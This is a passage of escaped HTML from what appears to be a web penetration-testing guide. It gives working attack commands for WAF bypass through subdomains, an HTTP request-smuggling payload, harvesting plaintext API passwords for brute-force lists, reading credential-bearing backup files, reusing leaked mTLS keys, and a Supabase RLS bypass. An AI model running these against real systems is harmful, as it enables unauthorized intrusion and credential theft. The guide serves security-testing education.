&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// 3. Search for sinks in the JS bundles
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Static analysis of the bundles:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rg &lt;span style="color:#a6d189"&gt;&amp;#39;__proto__|constructor\[|prototype\[&amp;#39;&lt;/span&gt; bundle.js
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rg &lt;span style="color:#a6d189"&gt;&amp;#39;\.innerHTML\s*=&amp;#39;&lt;/span&gt; bundle.js &lt;span style="color:#e78284"&gt;#&lt;/span&gt; DOM XSS sinks
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rg &lt;span style="color:#a6d189"&gt;&amp;#39;eval\(|new Function\(&amp;#39;&lt;/span&gt; bundle.js &lt;span style="color:#e78284"&gt;#&lt;/span&gt; Code execution sinks
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rg &lt;span style="color:#a6d189"&gt;&amp;#39;Math\.random\(\)&amp;#39;&lt;/span&gt; bundle.js &lt;span style="color:#e78284"&gt;#&lt;/span&gt; Weak randomness
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rg &lt;span style="color:#a6d189"&gt;&amp;#39;\.merge\(|Object\.assign\(&amp;#39;&lt;/span&gt; bundle.js &lt;span style="color:#e78284"&gt;#&lt;/span&gt; Unsafe merges
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2612-akamaicdn-waf-bypass-via-direct-subdomains" &gt;
&lt;div&gt;
&lt;a href="#2612-akamaicdn-waf-bypass-via-direct-subdomains"&gt;
##
&lt;/a&gt;
26.12 Akamai/CDN WAF Bypass via Direct Subdomains
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Admin/internal subdomains often do NOT pass through WAF:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Enumerate ALL subdomains&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;subfinder -d target.com | httpx -o alive.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Test each one for WAF bypass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; sub; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$sub&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: %{http_code}\n&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$sub&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/.env&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt; &amp;lt; alive.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Subdomains returning 200/403 (exists) vs 406/blocked (WAF):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# admin.target.com → 403 (exists, no WAF!) ← BYPASS!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# www.target.com → 406 (blocked by the WAF)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# api.target.com → 200 (exists, no WAF!) ← BYPASS!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Subdomain patterns that frequently bypass WAF&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;admin.*&lt;/code&gt;, &lt;code&gt;dashboard.*&lt;/code&gt;, &lt;code&gt;internal.*&lt;/code&gt;, &lt;code&gt;dev.*&lt;/code&gt;, &lt;code&gt;staging.*&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;*hmg.*&lt;/code&gt;, &lt;code&gt;*homolog.*&lt;/code&gt; (staging)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;*-int.*&lt;/code&gt;, &lt;code&gt;*internal.*&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Server&amp;rsquo;s direct IP (discover via DNS history)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="2613-http-request-smuggling--the-basics" &gt;
&lt;div&gt;
&lt;a href="#2613-http-request-smuggling--the-basics"&gt;
##
&lt;/a&gt;
26.13 HTTP Request Smuggling — The Basics
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;HTTP Smuggling occurs when the front-end (proxy/CDN) and back-end disagree on where one request ends and the next begins.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Main variants&lt;/strong&gt;:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Variant&lt;/th&gt;
&lt;th&gt;Front-end uses&lt;/th&gt;
&lt;th&gt;Back-end uses&lt;/th&gt;
&lt;th&gt;How to detect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CL.TE&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Content-Length&lt;/td&gt;
&lt;td&gt;Transfer-Encoding&lt;/td&gt;
&lt;td&gt;Send both conflicting headers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;TE.CL&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Transfer-Encoding&lt;/td&gt;
&lt;td&gt;Content-Length&lt;/td&gt;
&lt;td&gt;Inverse&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;TE.TE&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;TE (one value)&lt;/td&gt;
&lt;td&gt;TE (another value)&lt;/td&gt;
&lt;td&gt;Obfuscate one of the TE headers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;H2.CL&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HTTP/2 Content-Length&lt;/td&gt;
&lt;td&gt;HTTP/1.1 Content-Length&lt;/td&gt;
&lt;td&gt;Downgrade H2→H1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;H2.TE&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HTTP/2&lt;/td&gt;
&lt;td&gt;HTTP/1.1 Transfer-Encoding&lt;/td&gt;
&lt;td&gt;Inject TE in the downgrade&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Basic CL.TE test:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;printf&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;POST / HTTP/1.1\r\nHost: TARGET\r\nContent-Length: 50\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\n\r\n&amp;#39;&lt;/span&gt; | nc TARGET &lt;span style="color:#ef9f76"&gt;80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Burp Suite: HTTP Request Smuggler extension&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Tools: smuggler.py, h2csmuggler&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;⚠️ Smuggling is complex and dangerous&lt;/strong&gt; — can affect real traffic from other users. Only test with explicit authorization.&lt;/p&gt;
&lt;h3 id="2614-plaintext-passwords-in-api-responses" &gt;
&lt;div&gt;
&lt;a href="#2614-plaintext-passwords-in-api-responses"&gt;
##
&lt;/a&gt;
26.14 Plaintext Passwords in API Responses
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;APIs that return passwords in plaintext (it should never happen, but it does):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Find endpoints that return credentials&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/admins&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | {email, password}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → &amp;#34;password&amp;#34;:&amp;#34;Pratibha7231@&amp;#34; (plaintext!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/users&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | {user, pass, hash}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → &amp;#34;pass&amp;#34;:&amp;#34;Admin@123&amp;#34; (plaintext!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If found, extract ALL credentials and look for patterns (common suffix, year, company name) to generate brute force wordlists.&lt;/p&gt;
&lt;h3 id="2615-backup-php-files--source-code-with-credentials" &gt;
&lt;div&gt;
&lt;a href="#2615-backup-php-files--source-code-with-credentials"&gt;
##
&lt;/a&gt;
26.15 Backup PHP Files — Source Code with Credentials
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;.php.backup&lt;/code&gt;, &lt;code&gt;.php.bak&lt;/code&gt;, &lt;code&gt;.php~&lt;/code&gt; files often expose source code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List the directory (if directory listing is enabled)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/&amp;#34;&lt;/span&gt; | grep -E &lt;span style="color:#a6d189"&gt;&amp;#39;\.php|\.backup|\.bak|\.old|\.ini&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Read the backup (served as text, not executed as PHP)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/abrir-suporte.php.backup&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Source code with a hardcoded API token:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# $api_token = &amp;#34;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&amp;#34;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/config.php.bak&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → DB credentials: host, user, password, database&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2616-mtls-certificate-export" &gt;
&lt;div&gt;
&lt;a href="#2616-mtls-certificate-export"&gt;
##
&lt;/a&gt;
26.16 mTLS Certificate Export
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Certificates with private key exposed in public directories:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If you find a .pem certificate with a private key (no passphrase):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/certificates/certificado.pem&amp;#34;&lt;/span&gt; | head -20
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# -----BEGIN CERTIFICATE-----&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# -----END CERTIFICATE-----&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# -----BEGIN PRIVATE KEY----- ← PRIVATE KEY INCLUDED!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Use it to authenticate against APIs that require mTLS:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl --cert certificado.pem &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://api.banco.com/v1/charge/123&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Enumerate all certificates in the directory&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; id in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;seq &lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; 100&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -s -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}\n&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/certificates/cert-&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.pem&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2617-supabase--advanced-techniques" &gt;
&lt;div&gt;
&lt;a href="#2617-supabase--advanced-techniques"&gt;
##
&lt;/a&gt;
26.17 Supabase — Advanced Techniques
&lt;/div&gt;
&lt;/h3&gt;
&lt;h4 id="rls-bypass-via-cross-organization-idor" &gt;
&lt;div&gt;
&lt;a href="#rls-bypass-via-cross-organization-idor"&gt;
###
&lt;/a&gt;
RLS Bypass via Cross-Organization IDOR
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If a table has RLS but allows UPDATE of your own profile WITHOUT checking organization_id:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PATCH &lt;span style="color:#a6d189"&gt;&amp;#34;https://{PROJECT}.supabase.co/rest/v1/profiles?id=eq.{MY_ID}&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: {ANON_KEY}&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer {ANON_KEY}&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;organization_id&amp;#34;:&amp;#34;TARGET_ORG_UUID&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Now you see the target organization&amp;#39;s dashboard&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SQL Fix:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ALTER POLICY profile_update ON public.profiles&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# WITH CHECK (organization_id = (SELECT organization_id FROM profiles WHERE id = auth.uid()));&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="rpc-functions-without-organization-filter" &gt;
&lt;div&gt;
&lt;a href="#rpc-functions-without-organization-filter"&gt;
###
&lt;/a&gt;
RPC Functions without Organization Filter
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# RPC functions often return GLOBAL data:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://{PROJECT}.supabase.co/rest/v1/rpc/get_stats&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: {ANON_KEY}&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer {ANON_KEY}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Returns statistics from ALL organizations, not just yours&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SQL Fix: Add SECURITY DEFINER + WHERE org_id = ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="multi-tenant-enumeration-via-whois" &gt;
&lt;div&gt;
&lt;a href="#multi-tenant-enumeration-via-whois"&gt;
###
&lt;/a&gt;
Multi-Tenant Enumeration via WHOIS
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Get the email from the target domain&amp;#39;s WHOIS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;whois target.com | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;email\|@&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Find other domains owned by the same owner&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → reverse WHOIS, crt.sh, Google dorks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. All sites from the same dev share the same flaws:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Same stack (Supabase + Lovable.dev)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Same broken-RLS patterns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Same APIs with open signup&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2618-exposed-prometheusgrafana" &gt;
&lt;div&gt;
&lt;a href="#2618-exposed-prometheusgrafana"&gt;
##
&lt;/a&gt;
26.18 Exposed Prometheus/Grafana
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Prometheus (port 9090) — internal metrics and targets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:9090/api/v1/targets&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# All monitored targets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:9090/api/v1/label/__name__/values&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# All metrics&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:9090/api/v1/query?query=up&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Status of all services&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Grafana (port 3000) — dashboards without auth&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:3000/api/search&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# List all dashboards&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:3000/api/dashboards/home&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Main dashboard&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:3000/api/org&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Organization info&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# RabbitMQ management (port 15672)&lt;/span&gt;
